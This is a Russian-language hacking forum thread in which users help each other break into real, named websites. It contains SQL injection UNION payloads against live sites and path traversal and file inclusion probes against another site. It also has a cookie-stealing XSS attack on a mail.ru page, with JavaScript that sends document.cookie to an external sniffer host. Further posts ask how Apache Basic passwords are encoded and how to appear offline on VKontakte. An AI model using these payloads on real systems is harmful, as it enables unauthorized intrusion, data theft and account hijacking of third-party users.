Ваши вопросы по уязвимостям.

мда, информации море:

1. Для вывода одного параметра concat нафинг не нужен (тогда уже group_concat)
2. Проверить правильность написания именя поля + имени таблицы
3. Попробуй unhex(hex(tp))
4. Ссылку в студию или в личку
5. "кроме всяческих ошибок" - текст ошибок когда в студии - 99% успешных подсказок.
6. Пустая табла - пробуй считать - -24+union+select+1,count(tp)+from+events--

по п.6 - скорее всего 0 выведет

 

покажи ссылку что догадки строить, так до утра будешь искать

 

таблица events существует? поле tp существует?
попробуй для начала
-1+union+select+1,2--

 

да всё сушествует..
кароче ошибка:
No database selected : никакая база данных не выбранна!

 

Заканчивай с гаданием. Без линка на вопрос не ответить. Я готов поспорить, что там всё элементарно, и тебе уже ответили на вопрос. Не хочешь сюда линк, кто-то там в приват просил, а гадания на 10 страниц ни к чему

https://forum.antichat.ru/thread104591.html
вопросы 2.3.4. Если после прочтения ответов на эти вопросы ничего не получится , линк или сюда или в ПМ. Я это писал для того, что-бы вопросы по кругу не ходили, но видимо бесполезно потратил время

 

Подскажите на каком движке сайт и если можно какие дыры есть http://space.lv

 

Как быть ofline на vkontakte.ru

Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

Где под firefox 3 в ubuntu можно найти сам этот profile.php ?

 

http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..

 

Подскажите здесь есть вывод данных -
http://www.sklad-kadri.si/kadrovske/?k=izpis&id=5061112000123123+union+select+1,2,3,4,5,6--+ ?

 

Тут:

Code:

http://www.sklad-kadri.si/kadrovske/?k=izpis&id=-5061112000123123+union+select+1,2,3,4,5,6,7,8,9,0,11,12/*

 

Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?

 

как они выглядят покажи

 

В basic используется Base64 шифрование.

 

Для передачи - шифрование base64, но в самих файлах (.htpasswd) пассы обычно зашифрованы DES'ом

 

http://www.zabihah.com/da.php?id=1/../../../../../index

 

Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ?????

 

Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...

 

если хош украсть куки тебе ишо нужен сниффер!
тута усе расписано было!

 

Т.е. выглядеть будет примерно так???:

http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script>

А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;

 

Как быть offline vkontakte.ru